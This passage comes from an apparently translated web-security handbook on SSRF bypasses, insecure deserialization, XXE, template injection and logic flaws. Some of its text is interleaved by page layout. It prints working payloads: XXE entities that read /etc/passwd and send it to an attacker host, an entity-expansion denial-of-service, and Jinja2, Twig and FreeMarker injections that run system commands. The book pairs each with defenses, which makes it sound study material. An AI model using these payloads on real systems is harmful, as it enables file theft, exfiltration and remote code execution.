- DNS Poisoning: Manipulation of DNS records to redirect
to a server controlled by the attacker.
- Open redirection attacks: Exploiting open redirection vul-
nerabilities in the website to access unpermitted resources.
2. Domain and URL blacklists
1. Protection: Blocks requests to specific domains or URLs
known to be malicious.
2. Bypass:
- IP address obfuscation: Use IP addresses instead of domain
names, hexadecimal or decimal encoding.
- DNS forwarding attacks: Dynamically change the IP
address associated with a domain name.
- Use of URL shortening services: Hiding the real URL behind
a shortening service.
Validating URL schemes
1. Protection: Allow only specific URL schemes (http, https).
2. Bypass:
- Use of alternative URL schemes: file://, gopher://, dict://.
- Newline character injection: Include line breaks in the
URL to bypass filters.
web vulnerabilities
4. Disable URL resolution.
1. Protection: Prevent the server from resolving domain
names to IP addresses.
2. Bypass:
- Directly use IP addresses: Instead of domain names.
- Blind SSRF attacks: Send requests to internal servers and
observe the indirect responses to infer information.
5. Filtering of special characters
1. Protection: Block special characters that can be used to
inject malicious payloads. 2.
2. Bypass:
- Character encoding: Use URL, hexadecimal or Unicode
encoding to bypass filters.
- Use alternate characters: Replace blocked characters with
similar characters that are not filtered.
6. WAF (Web Application Firewall)
1. Protection: Detect and block suspicious traffic patterns
that may indicate an SSRF attack.
2. Bypass:
- Payload obfuscation: Use encryption and obfuscation
techniques to avoid detection.
- Timing attacks: Exploit differences in response times to
bypass WAF rules.
SSRF Protective Bypass Defenses
- Strict input validation: Implement multi-layered input
validation to ensure that URLs are valid and secure.
- Whitelist domains and URLs: Restrict requests to a limi
ted set of trusted resources.
- Disable URL resolution: Prevent the server from resolving
domain names to IP addresses.
- Special character filtering: Block characters that can be
used to inject malicious payloads.
- WAF (Web Application Firewall): Configure specific rules
to detect and block suspicious traffic patterns.
- Monitoring and logging: Log all outgoing requests to iden
tify SSRF attempts.
- Software update: Keep software up to date to correct
known vulnerabilities.
85

Escalating the attack
While basic SSRF can reveal sensitive information, this chap
ter explores how attackers can escalate their SSRF atta
cks to achieve full exploitation, from internal network access
to remote code execution.
1. Internal Network Exploration
- Goal: Map the internal network, identify open services
and ports.
- Techniques:
1. Port Scan: Use SSRF to send requests to different ports
on the internal network and determine which ones are open.
2. Service discovery: Identify services running on open
ports (HTTP, FTP, SSH, etc.).
3. Information Discovery: Access internal administration
pages, control panels or other interfaces that may reveal
sensitive information.
- Example:
http://sitio-vulnerable.com/
vulnerabilidad-ssrf?url=http://192.168.0.1:80
2. Attacks on Internal Services
- Objective: Exploit vulnerabilities in identified internal
services.
- Techniques:
- Attacks on web services: Inject malicious payloads into
SSRF requests to exploit vulnerabilities in internal web
applications.
- Database attacks: Accessing internal databases via SSRF
and performing malicious SQL queries.
- Attacks on file services: Reading, writing or modifying files
on internal servers via SSRF.
- Example:
http://sitio-vulnerable.com/vulnerabilidad-ssrf?url=http://
servidor-interno.com?vulnerabilidad-sql?consulta=maliciosa
86 MILLIONAIRE RECORDS
3. Blind SSRF
- Objective: Exploit SSRF when there is no direct response
from the vulnerable server.
- Techniques:
1. Time-based attacks: send SSRF requests that cause a
delay in the vulnerable server's response if the request
succeeds.
2. DNS-based attacks: Send SSRF requests to a DNS server
controlled by the attacker and analyze the DNS queries to
determine if the SSRF request was successful.
3. External request-based attacks: Send SSRF requests to an
external server controlled by the attacker and analyze
the server logs to determine if the SSRF request was
successful.
4. Cloud SSRF
- Goal: Exploit SSRF in cloud environments to access ins
tance metadata, cloud services and other APIs.
- Techniques:
1. Instance metadata attacks: access instance metadata from
cloud providers (AWS, Azure, GCP) via SSRF.
2. Attacks on cloud services: Accessing cloud services (sto
rage, databases, functions) via SSRF.
3. Attacks on cloud APIs: Exploiting vulnerabilities in cloud
provider APIs.
Defenses against SSRF attacks escalation
- Input validation: Strictly validate user-supplied URLs to
prevent them from pointing to internal resources.
- URL whitelisting: Allow only requests to specific, known
URLs.
- Disable unnecessary protocols: Disable protocols such as
file://, gopher://, dict:// if they are not needed.
- Web Application Firewall (WAF): Configure the WAF to
detect and block SSRF attack patterns.

Automating the attack
While manual detection of SSRF is possible, automation
offers significant advantages in terms of efficiency and
ability to discover hidden vulnerabilities. This chapter explo
res how to automate SSRF attacks, from reconnaissance
to exploitation.
1. Automated Reconnaissance
- Goal: Identify potential entry points for SSRF in a web
application.
- Tools:
1. Web crawlers (Crawlers): collect URLs and parame
ters from a web application. Examples: Burp Suite Spider,
ZAP Spider.
2. Vulnerability scanners: Search for known SSRF pat
terns in source code and server responses. Examples: Nuclei,
Bandit.
3. Traffic analysis: Inspect network traffic for suspicious
requests that may indicate SSRF. Examples: Burp Suite
Proxy, Wireshark.
- Example: Use a web crawler to collect all URLs of a web
application and then use a vulnerability scanner to scan
each page for SSRF patterns.
1. Penetration testing frameworks: automate injection
and testing of SSRF payloads. Examples: Burp Suite Intruder,
ZAP Active Scan.
2. Custom scripts: Develop scripts to automate speci
fic tasks, such as payload injection in forms or URL
parameters.
- Example: Use Burp Suite Intruder to inject a list of SSRF
payloads into a URL parameter and analyze server
responses to detect if any request was successfully executed.
4. Automated Monitoring and Alerting
- Goal: Receive real-time notifications when an SSRF vul
nerability is discovered or an exploitation attempt is
detected.
- Tools:
1. Intrusion detection systems (IDS): monitor network traf
fic for SSRF attack patterns. Examples: Snort, Suricata.
2. WAF (Web Application Firewall): Block suspicious
requests
that may indicate an SSRF attack.
- Example: Configure an IDS to generate alerts when SSRF
requests attempting to access internal resources are
detected.
Ethical and Legal Considerations

2. Automated Payload Generation Automating SSRF attacks must be done in a responsible

and ethical manner. It is critical to obtain proper permision
- Goal: Create custom SSRF payloads to evade filters and before testing on third-party systems and to avoid causing
maximize impact. damage or disruption.
- Tools:
1. SSRF payload generators: create SSRF payloads based
on different obfuscation techniques and protocols.
Examples: SSRFmap, tplmap.
2. Payload lists: Compilations of known and effective
SSRF payloads.
- Example: Use a SSRF payload generator to create a payload
that uses the gopher:// protocol to access internal resources.

3. Automated Injection and Testing

- Goal: Inject SSRF payloads at identified entry points and

verify if they execute.
- Tools:

web vulnerabilities 87
2 . 9 - I N S E C U R E DE S E RI- } catch (Exception e) {
e.printStackTrace();

AL I Z AT I O N # 2. 9 }
}
}
---------------
Insecure deserialization is a vulnerability that occurs when
an application deserializes untrusted data and then executes or If the data.ser file contains a manipulated object, the atta-
interprets that data as code. This vulnerability can allow an atta- cker can execute arbitrary commands on the server.
cker to execute arbitrary code, modify existing data, or perform
additional attacks. Insecure deserialization is one of the most dan- Example 2: Data Manipulation
gerous vulnerabilities in applications that handle serialized data,
especially in systems that use objects to exchange information. An application that uses serialized objects to store user
information could be exposed to data manipulation. For exam-
Understanding Insecure Deserialization ple, if a serialized object contains a user's role, an attacker could
modify the role to gain administrative privileges.
Serialization is the process of converting an object into a
format that can be stored or transmitted and then reconstruc- ---------------
ted. Deserialization is the reverse process. When an application # Example in Python using pickle
deserializes data without properly validating its origin or content, import pickle
it may be exposed to insecure deserialization.
class User:
Real Examples of Insecure Deserialization def __init__(self, username, role):
self.username = username
To better understand how insecure deserialization works, self.role = role
let's look at some examples that illustrate its exploitation and
possible impacts. # An attacker can create an object with administrator role
malicious_user = User("attacker", "admin")
Example 1: Arbitrary Code Execution serialized_user = pickle.dumps(malicious_user)

Suppose a Java application deserializes objects that are # The application deserializes the object without validation.
received via an HTTP request. If an attacker can manipulate the deserialized_user = pickle.loads(serialized_user)
contents of those objects, he could introduce malicious code to print(deserialized_user.role) # Output: admin
be executed during the deserialization process. ---------------

--------------- Risks and Consequences

import java.io.*;
Insecure deserialization vulnerabilities can have serious
public class VulnerableApp { consequences:
public static void main(String[] args) {
try { Remote Code Execution (RCE): Attackers can execute arbi-
ObjectInputStream ois = new trary code on the server, which can lead to compromising the
ObjectInputStream(new FileInputStream("data.ser")); entire system.
Object obj = ois.readObject(); Data Manipulation: Data within deserialized objects can be
ois.close(); manipulated to escalate privileges or alter critical information.

88 MILLIONAIRE RECORDS
 Unauthorized Access: Attackers can access sensitive data 4. Use Secure Libraries: Use libraries and frameworks
without proper authorization. that provide secure deserialization mechanisms. Some modern
Denial of Service (DoS): Deserialization attacks can con- libraries have built-in security measures to prevent insecure
sume system resources, causing a denial of service. deserialization.

Preventing Insecure Deserialization
To prevent insecure deserialization, it is essential to imple-
ment appropriate security measures:
1. Use of Secure Data Formats: whenever possible, avoid
deserializing data and use more secure formats, such as JSON
or XML, which do not allow code execution.
---------------
import json
5. Monitoring and Logging: Implement monitoring and log-
ging of deserialization events to detect and respond to suspi-
cious activity.
Insecure deserialization is a critical vulnerability that can
have a devastating impact on the security of an application. By
understanding how deserialization works and the techniques
attackers use to exploit it, you can implement effective security
measures to protect your applications. Be sure to use secure
data formats, validate and sanitize inputs, implement whitelis-
ting, use secure libraries and monitor deserialization activities.

# Using JSON instead of pickle

user_data = json.dumps({"username": "user", "role": "user"})
parsed_data = json.loads(user_data)
---------------

2. Input Validation and Sanitization: Validate and sanitize all

input data before deserializing it. Make sure that they come from
reliable sources and that they comply with the expected formats.

3. Whitelist Implementation: Use whitelists to control which

classes can be deserialized. This helps prevent deserialization of
unauthorized or dangerous classes.

---------------
// Java example using a whitelist
ObjectInputStream ois = new ObjectInputStream(new
FileInputStream("data.ser")) {
protected Class<?> resolveClass(ObjectStreamClass
desc) throws IOException, ClassNotFoundException {
if (desc.getName().equals("com.example.SafeClass")) {
return super.resolveClass(desc);
} else {
throw new InvalidClassException("Unauthorized
deserialization attempt", desc.getName());
}
}
};
---------------

web vulnerabilities 89
2 . 1 0 - X M L E X TE R NA L
EN T I T Y( X X E ) # 2. 1 0
The XML External Entity (XXE) vulnerability occurs when
an application that processes XML data does not properly disa-
ble external entity resolution within XML entries. This vulnera-
bility can allow attackers to access local files, perform network
requests, and in some cases, execute remote code. XXE is a
serious security threat to any application that accepts or mani-
pulates XML data.
Understanding the XXE Vulnerability
Most modern applications use XML for data transmission.
XML documents can contain external entities, which are refe-
rences to external resources. If these references are not handled
correctly, they can be exploited by attackers to extract sensitive
information or execute malicious code.
Real Examples of XXE
To understand how the XXE vulnerability works, let's look
at some examples that illustrate its exploitation and possible
impacts.
Example 1: Reading Local Files
An attacker can inject an external entity into an XML request
to read local files on the server.
----------------
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</
foo>
----------------
If the application does not disable external entity resolu-
tion, the contents of the /etc/passwd file will be included in the
server response.
90 MILLIONAIRE RECORDS
Example 2: Network Requests (SSRF)
XXE can also be used to make network requests from the
affected server, a type of attack known as Server-Side Request
Forgery (SSRF).
----------------
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://attacker.com/malicious"
>]><foo>&xxe;</foo>
----------------
In this case, the external entity points to a remote resource.
The server makes an HTTP request to the URL specified by the
attacker.
Risks and Consequences
XXE vulnerabilities can have serious consequences:
1. Data Exfiltration: Attackers can read sensitive local files
and exfiltrate confidential information.
2. Denial of Service (DoS): XXE attacks can be used to
exhaust server resources and cause a denial of service.
3. Remote Code Execution (RCE): In some cases, XXE can
lead to remote code execution on the server.
4. Network Requests (SSRF): Attackers can make unau-
thorized network requests from the affected server,
accessing internal or external resources.
Preventing Vulnerability XXE
To prevent the XXE vulnerability, it is crucial to follow best
security practices when processing XML data:
1. Disable External Entities: disable external entity resolu-
tion in XML parsers.
----------------
// Java example
DocumentBuilderFactory dbf = DocumentBuilderFactory.
newInstance();
 dbf.setFeature("http://apache.org/xml/features/disallow-
-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-ge-
neral-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-para-
meter-entities", false);
dbf.setFeature("http://apache.org/xml/features/nonvalida-
ting/load-external-dtd", false);
----------------

----------------
# Example in Python using defusedxml
from defusedxml.lxml import parse

# Parse XML in a safe way

xml_data = parse('data.xml')
----------------

2. Input Validation and Sanitization: Validate and sanitize all

XML inputs to ensure that they comply with expected formats
and do not contain malicious external entities.

3. Use of Secure Libraries: Use libraries and frameworks that

provide secure XML parsing mechanisms. Some modern libraries
have built-in security measures to prevent XXE.

4. Patching and Updating: Keep your libraries and XML par-

sers updated with the latest security patches to protect against
known vulnerabilities.

5. Monitoring and Logging: Implement XML activity moni-

toring and logging to detect and respond to XXE exploitation
attempts.

The XML External Entity (XXE) vulnerability is a critical

threat that can compromise the security of an application if
not handled properly. By understanding how XXE works and
the techniques attackers use to exploit it, you can implement
effective security measures to protect your applications. Be sure
to disable external entity resolution, validate and sanitize XML
inputs, use secure libraries, keep your systems up to date, and
monitor XML activities.

web vulnerabilities 91

Advanced search
XML external entity injection (XXE) vulnerabilities can have
serious consequences, allowing attackers to access
sensitive files, perform denial-of-service (DoS) atta-
cks and even execute code remotely. This chapter will
guide you through the process of finding and exploi-
ting XXE, from identifying entry points to executing
malicious payloads.
1. What is XXE?
- XML: Extensible Markup Language used to structure data.
- Entities: Storage units within an XML document that may
represent data or references to external data.
- External Entities: Entities that refer to external resources,
such as files or URLs.
- XXE Vulnerability: Occurs when an XML parser processes
untrusted external entities provided by an attacker.
2. Identifying Entry Points
- Functionalities that process XML: Look for XML file loa-
ding forms, APIs that accept XML data, SOAP-based
web services, etc.
- Traffic analysis: Use tools such as Burp Suite or ZAP to
intercept and analyze requests and responses con-
taining XML.
- Documentation: Review application documentation for
mentions of XML or functionality that may be sus-
ceptible to XXE.
3. Testing the Vulnerability
- Basic test: Replace an internal entity in the XML with an
external entity that references a local file controlled
by the attacker (e.g., /etc/passwd).
- Blind XXE: If no direct response is received, uses Blind
XXE techniques to exfiltrate data through requests to
a server controlled by the attacker.
- XXE with DTD (Document Type Definition): Injects an
external DTD defining malicious entities to execute
more sophisticated attacks.
92 MILLIONAIRE RECORDS
4. Exploiting XXE
- File exfiltration: Reads sensitive files from the server file
system, such as configuration files or passwords.
- SSRF (Server-Side Request Forgery) attacks: Makes
requests from the server to other internal or exter-
nal systems.
- DoS attacks: Injects recursive entities that consume ser-
ver resources and cause the server to crash.
- Remote Code Execution (RCE): In some cases, XXE can
lead to code execution on the server if certain condi-
tions are met.
5. Examples of XXE Payloads
Basic XXE:
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/pas-
swd"> ]>
<data>&xxe;</data>.
Blind XXE:
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://sitio-
-atacante.com/malicioso.dtd"> %xxe; ]>
XXE with external DTD:
<!DOCTYPE foo [ <!ENTITY % file SYSTEM "file:///etc/
passwd"> <!ENTITY % eval "<!ENTITY &#x25; exfil-
trate SYSTEM 'http://sitio-atacante.com/?x=%file;'>">
%eval; %exfiltrate; ]>
6. XXE prevention
- Disable external entity processing: Configures the XML
parser not to process external entities.
- Input validation: Strictly validates XML data before
processing.
- WAF (Web Application Firewall): Uses a WAF to detect
and block XXE attack patterns.
Additional Considerations

- XXE in SOAP: XXE can be especially dangerous in SOAP-

based web services.
- XXE in REST APIs: Some REST APIs that accept XML may
also be vulnerable to XXE.
- XXE in mobile applications: Mobile applications that pro-
cess XML may also be vulnerable.

web vulnerabilities 93

Sobrepasando la protección
Developers implement various protection measures to
mitigate these attacks, but clever attackers are always looking
for ways to bypass these defenses. This chapter explores the
techniques and strategies used to overcome XXE protection
and exploit these vulnerabilities.
1. Basic Protection and its Limitations
- Disabling external entities: The most basic form of pro-
tection is to disable external entity resolution in the XML parser.
- Limitations: This measure can be effective against simple
XXE attacks, but does not protect against more sophisticated
attacks that use internal entities or evasion techniques.
2. XXE Protection Evasion Techniques
- Internal entities: Use internal entities to define and refe-
rence malicious entities within the XML document.
- Denial-of-service (DoS) attacks: Exploiting recursive entity
expansion to consume server resources and cause a denial of
service.
- Parameterized entities: Using parameterized entities to
obfuscate malicious payload and evade security filters.
- Injecting external entities into attributes: Inject exter-
nal entities into XML attributes instead of elements to avoid
detection.
- Use of alternative protocols: Use protocols such as FTP or
gopher instead of HTTP to retrieve external entities and avoid
security filters.
3. Examples of XXE Protection Evasion
- Evasion of disabling external entities:
XML
<!DOCTYPE foo [
<!ENTITY % localDTD SYSTEM "file:///etc/passwd">
<!ENTITY % payload "<!ENTITY exfil SYSTEM 'http://sitio-
-atacante.com/?data=%localDTD;'>">
%payload;
94 MILLIONAIRE RECORDS
]>
- DoS attack with entity expansion:
XML
<!DOCTYPE data [
<!ENTITY a0 "two">
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0
;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1
;&a1;&a1;">
]>
<data>&a2;</data>.
- Use of parameterized entities:
XML
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM
'http://sitio-atacante.com/?x=%file;'>">
%eval;
%exfiltrate;
]>
4. Advanced XXE Attack Mitigation.
- Entity Whitelisting: Allow only a specific set of known
and secure entities.
- Schema validation: Use XML schemas to validate the
structure and content of XML documents before proces-
sing them.
- Static security analysis (SAST): Use SAST tools to analyze
source code for XXE vulnerabilities.
- Dynamic security analysis (DAST): Perform security tests
on the running application to detect XXE vulnerabilities.
- WAF (Web Application Firewall): Configure a WAF to
detect and block XXE attack patterns.
Final Considerations
Protection against XXE attacks requires a multi-layered
approach that combines preventive measures, detection
and mitigation. Staying up-to-date on the latest evasion
techniques and applying security patches in a timely man-
ner is critical.
Escalating the attack
While exfiltration of sensitive data is a serious risk, XXE
attacks can be scaled for even greater impact. This chapter
explores the advanced techniques and strategies attackers
use to maximize the damage caused by an XXE.
1. Denial of Service (DoS) Attacks
- Objective: Disrupt the normal operation of the applica-
tion or server.
- Technique: Exploit the ability of XML entities to perform
recursive references and consume system resources.
- Example:
XML
<!DOCTYPE data [
<!ENTITY a0 "two">
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0
;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1
;&a1;&a1;">
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2
;&a2;&a1;">
]>
<data>&a3;</data>.
2. Remote Code Execution (RCE)
- Goal: Execute arbitrary code on the server that proces-
ses the XML.
- Technique: Depends on server configuration and XML
libraries used. Some XXE vulnerabilities allow loading exter-
nal entities from protocols such as FTP or HTTP, which can
lead to the inclusion of malicious scripts.
- Example: (Requires specific server configuration)
XML
web vulnerabilities
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://sitio-ata-
cante/script-malicioso.php"> ]>
<foo>&xxe;</foo>
3. File System Attacks
- Goal: Read or modify arbitrary files on the server.
- Technique: use parameter entities to access local files
through protocol wrappers such as file://.
- Example:
XML
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/pas-
swd"> ]>
<foo>&xxe;</foo>
4. Internal Network Attacks
- Goal: Scan the internal network behind the vulnerable
server.
- Technique: Use parameter entities to make requests to
internal services (e.g., databases) or scan ports.
5. Blind XXE
- Objective: Exploit XXE when there is no direct response
from the server.
- Technique: Use external entities to send data to a ser-
ver controlled by the attacker, allowing information about
the XML structure and server configuration to be inferred.
Defenses against XXE attack escalation
- Disable external entity processing (DTD): This is the most
effective measure.
- Use a secure XML parser: Opt for parsers that do not
support external DTDs or parameter entities.
- Input validation: Strictly verify the structure and content
of incoming XML documents.
- WAF (Web Application Firewall): Configure rules to detect
and block XXE attack patterns.
95

Automating the attack
Automating this process allows security researchers and
attackers to scale their efforts, discover XXE vulnerabili-
ties more efficiently and perform more sophisticated atta-
cks. This chapter explores the key tools and techniques for
automating XXE attacks, from detection to exploitation.
Automated XXE Detection
- Goal: Identify web applications and services that are poten-
tially vulnerable to XXE.
- Tools:
1. Vulnerability scanners: look for known pat-
terns of XXE vulnerabilities in HTTP requests and respon-
ses. Examples: OWASP ZAP, Burp Suite.
2. Fuzzers: Send specially designed XXE payloads to appli-
cations to test their behavior and detect vulnerabilities.
Examples: Wfuzz, ffuf.
- Example: Using a vulnerability scanner to automatically
scan a web application for signs of XXE vulnerabilities, such
as revealing errors in responses or the ability to include
external entities in XML documents.
2. Automated Generation of XXE Payloads
- Goal: Create custom XXE payloads for different attack
scenarios, such as data exfiltration, remote code execution
(RCE) or denial of service (DoS).
- Tools:
XXE payload generators: create XXE payloads based on
predefined templates or on specific parameters. Examples:
XXEinjector, xxe-payload-generator.
2. XXE payload libraries: Collections of ready-
-to-use XXE payloads tested in different environments.
- Example: Use an XXE payload generator to create a payload
that attempts to read the /etc/passwd file of a vulnerable
system and send it to a server controlled by the attacker.
3. Automated Injection and Exploitation
- Goal: Inject XXE payloads into vulnerable applications
and automate the exploitation process to extract sensitive
96 MILLIONAIRE RECORDS
information, execute commands or cause outages.
- Tools:
XXE Exploitation Frameworks: provide a set of tools and
scripts to automate the injection of XXE payloads and exploi-
tation of vulnerabilities. Examples: XXExploiter, XXEServ.
Custom scripts: Develop your own scripts to automate spe-
cific tasks, such as extracting data from files or executing
commands via XXE.
- Example: Use an XXE exploit framework to automate
the injection of an XXE payload that attempts to execute
a command on the vulnerable server operating system.
4. XXE Attack Scaling and Optimization
- Goal: Maximize the impact of XXE attacks by automating
tasks such as enumerating files and directories, searching
for specific files, or exploiting multiple XXE vulnerabilities
in parallel.
- Techniques:
1. recursive file search: use XXE payloads to enumerate
files and directories recursively on the server file system.
2. Massive data exfiltration: Automate the extrac-
tion of large amounts of data through multiple XXE payloads.
*Parallel exploitation: Using multiple threads or processes
to exploit multiple XXE vulnerabilities simultaneously.
- Example: Develop a script that uses XXE to enumerate
all files in a specific directory on the vulnerable server and
then attempt to download them automatically.
Ethical and Legal Considerations
Automating XXE attacks must be done in a responsible and
ethical manner. It is critical to obtain proper permission
before testing on third-party systems and to avoid causing
unnecessary damage or disruption.
web vulnerabilities 97
2 . 1 0 - T E M P L ATE I NJE C-
TIO N # 2. 10
Imagine you commission an artist to paint your portrait, but
instead of using your image, they use that of a complete stranger.
The result might be a work of art, but it's definitely not what you
expected. In the world of web development, Template Injection
is like that erroneous portrait: the application works, but the
result is unexpected and potentially dangerous.
In essence, Template Injection is a vulnerability that occurs
when a web application uses untrusted data to build dynamic
templates. If an attacker gains control of this data, they can inject
malicious code into the template, which will then be executed
by the application with the same privileges as the template.
Why is Template Injection So Dangerous?
Template injection can have devastating consequences for
the security of a web application:
- Remote Code Execution (RCE): This is the holy grail of
many attackers. It allows them to execute arbitrary commands
on the server, giving them full control of the system.
- Information Disclosure: Attackers can use template injec-
tion to read sensitive files from the server, such as passwords,
API keys or client data.
- Denial of Service (DoS) attacks: They can inject code that
overloads the application, making it unusable for legitimate users.
Anatomy of a Template Injection Attack
To understand how template injection works, we must first
understand how template engines work. These engines allow
developers to create templates with placeholders (variables) that
are then populated with dynamic data. For example:
Hello, {{ user_name }}
In this case, {{ user_name }} is a variable that will be repla-
ced by the user's actual name when the template is rendered.
98 MILLIONAIRE RECORDS
The problem arises when the application does not properly
validate and sanitize the data that is inserted into the template.
If an attacker can control the value of user_name, they could
inject malicious code instead. For example:
{{ 7*7 }}
If the template engine is not protected, it will interpret this
expression and display the result (49) on the page. But an atta-
cker could go further and inject more dangerous code, such as:
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__
name__ == 'catch_warnings' %}{{{ c.__init__.__globals__['__buil-
tins__'].eval("__import__('os').popen('id').read()") }}{% endif %}{%
endfor %}{% endfor %}
This payload, designed for the Jinja2 template engine,
attempts to execute the id command on the server and display
the result on the page.
Examples of Template Injection Payloads
Template injection payloads may vary depending on the
engine used. Here are some examples for the most popular
engines:
- Twig: {{_self.env.registerUndefinedFilterCallback("exec")}}
{{_self.env.getFilter("id")}}}
- Jinja2: {{ config.items() }}}
- FreeMarker: <#assign ex = "freemarker.template.utility.
Execute"?new()>${ ex("id")}
How to Protect Yourself from Template Injection.
The best defense against template injection is prevention:
- Rigorous Input Validation: Never rely on user-supplied
data. Always validate and sanitize inputs before using them in
a template.
- Use Secure Templates: Opt for template engines that offer
built-in security mechanisms, such as sandboxing or whitelisting
of allowed functions.
- Principle of Least Privilege: Limit template permissions so
that only necessary resources can be accessed.
- Security Updates: Keep your software up to date to fix
known vulnerabilities.

Template injection is a powerful vulnerability that can be

exploited to cause serious damage. By understanding how it
works and how to protect yourself, you can ensure the security
of your web applications and protect your users from malicious
attacks.

web vulnerabilities 99
2 . 1 1 -AP P L I C AT I O N L O G- access or modify the same data at the same time, unexpected
results may occur.

I C ER R ORS # 2. 1 1 Finding and Correcting Application Logic Errors

Finding and correcting logic errors can be challenging, as

Imagine you ask a friend to bring you a latte, but he comes
back with an iced tea. There's nothing inherently wrong with the
iced tea, but it wasn't what you wanted. In the software world,
Application Logic Errors are like that unexpected iced tea: the
application works, but not the way it should.
Application logic errors are flaws in the design or imple-
mentation of an application's business logic. Unlike syntax or
runtime errors, which prevent the application from running,
logic errors allow the application to run, but produce incorrect
or unexpected results.
Why are Application Logic Errors Dangerous?
they often do not manifest themselves as obvious errors. Here
are some strategies that can help:
- Thorough Code Review: Carefully examine the source
code for logic errors.
- Unit and Integration Testing: Create automated tests to
verify that each component of the application works as expected.
- Black Box Testing: Tests the application from the user's
perspective, attempting to perform actions that could trigger
logic errors.
- Monitoring and Logging: Records the behavior of the
application and analyzes the logs for patterns that may indicate
logic errors.

Although not always as obvious as a system failure, logic Application logic errors are a silent but dangerous threat
errors can have serious consequences: to the security and reliability of any software. By understanding
how to identify and correct them, you can improve the quality
- Financial losses: A logic error in an e-commerce system of your application and protect your users from unexpected and
could allow users to purchase products at incorrect prices or potentially harmful results.
without paying.
- Data leaks: A logic error in a user management system
could allow users to access data they should not have access to.
- Reputational damage: A logic error in a voting system could
lead to incorrect results, undermining confidence in the process.

Common Examples of Application Logic Errors

Logic errors can manifest themselves in many ways, but

here are some common examples:

1. Incorrect Calculations: An error in the tax calculation for-

mula could lead to incorrect taxes being charged to customers.
2. Insufficient Input Validation: If an application does not
properly validate user input, an attacker could enter malicious
data that causes unexpected behavior.
Incorrect Error Handling: If an application does not handle
errors correctly, it could reveal sensitive information to attackers
or fail unexpectedly.
4. Race Conditions: If two or more processes attempt to

100 MILLIONAIRE RECORDS


Advanced search
Unlike technical vulnerabilities such as XSS or SQL Injection,
logic bugs are more difficult to detect and exploit, but can have
a significant impact on the security and functionality of an appli-
cation. This chapter explores how to identify and exploit logic
errors in applications.
1. Understanding the Business Flow
Goal: To understand how the application is supposed to
work at each stage of the business process 2.
2. Techniques:
- Requirements Analysis: Review the application requi-
rements documentation to understand the business rules and
constraints.
- Workflow mapping: Create flowcharts to visualize the
different stages of the business process and how they interact
with each other.
- Functional testing: Perform manual or automated tests
to verify that the application behaves as expected at each stage
of the workflow.
- Example: Analyze the purchase process in an online store
to understand how shopping carts, payments, shipments and
order confirmations are handled.
2. Identifying Logic Error Patterns
Objective: Recognize common patterns of logic errors that
can occur in different types of applications.
2. Common patterns:
- Incorrect state handling: The application does not correctly
validate or update the state of an object or process.
- Insufficient input validation: The application does not pro-
perly verify the data entered by the user.
- Incorrect calculations: The application performs erroneous
calculations in prices, discounts, quantities, etc.
Inadequate access control: The application does not
adequately restrict access to sensitive functions or data.
- Privilege escalation: A user can perform actions that he/
she should not be able to do.
- Parameter manipulation: A user can modify application
parameters to obtain undesired results.
- Example: Identifying a logic error in an online voting system
that allows a user to vote multiple times.
3. Testing Techniques for Logic Errors
Goal: Design and execute specific tests to uncover logic
errors in the application.
2. Techniques:
- Black box testing: Test the application without knowing its
source code, focusing on the inputs and outputs of the system.
- Gray box testing: Using partial knowledge of the source
code to design more specific tests.
- White box testing: Analyze the source code to identify
possible logic errors.
- Fuzzing: Sending random or unexpected inputs to the
application to detect anomalous behavior.
- Traffic analysis: Inspect network traffic between client and
server to identify inconsistencies or unexpected data.
- Example: Performing black box testing on an online
banking application to verify if it is possible to transfer money
to an invalid account.
4. Logic Error Exploitation
Goal: Exploit identified logic errors to gain unauthorized
access, manipulate data, or cause other negative impacts on
the application.
2. Techniques:
- Parameter manipulation: Modifying HTTP request para-
meters to bypass security controls or access restricted functions.
- Malicious data injection: Sending unexpected or malicious
data to the application to cause errors or unwanted behavior.
- Brute force attacks: Attempting different combinations of
inputs to find valid values to bypass security controls.
- Example: Exploiting a logic error in an e-commerce appli-
cation that allows products to be purchased at a lower price
than the actual price.
Ethical and Legal Considerations
Searching for and exploiting logic errors must be done in
a responsible and ethical manner. It is important to obtain pro-
per permission before testing on third-party applications and to
avoid causing damage or disruption.
web vulnerabilities 101

Bypass Protection
Application logic vulnerabilities are errors in the design or
implementation of an application that an attacker can exploit
to bypass security protections and gain unauthorized access or
perform unwanted actions. These errors are often more difficult
to detect than traditional technical vulnerabilities because they
require a deep understanding of how the application works and
how its various components interact.
Types of Application Logic Errors
- Authorization Errors: These occur when an application
does not properly verify whether a user has permission to per-
form a specific action. For example, an attacker could modify the
URL of a protected resource to access it without authentication.
- Access Control Errors: These allow an attacker to access
resources or functionality to which he/she should not have
access. For example, an attacker could manipulate the parame-
ters of a request to view another user's confidential information.
- Input Validation Errors: Occur when an application fails
to properly validate user-supplied data, allowing an attacker to
inject malicious code or manipulate the application's behavior.
- State Handling Errors: Occur when an application does not
properly manage the state of a session or transaction, allowing
an attacker to manipulate the flow of the application or perform
unauthorized actions.
- Calculation Errors: Occur when an application performs
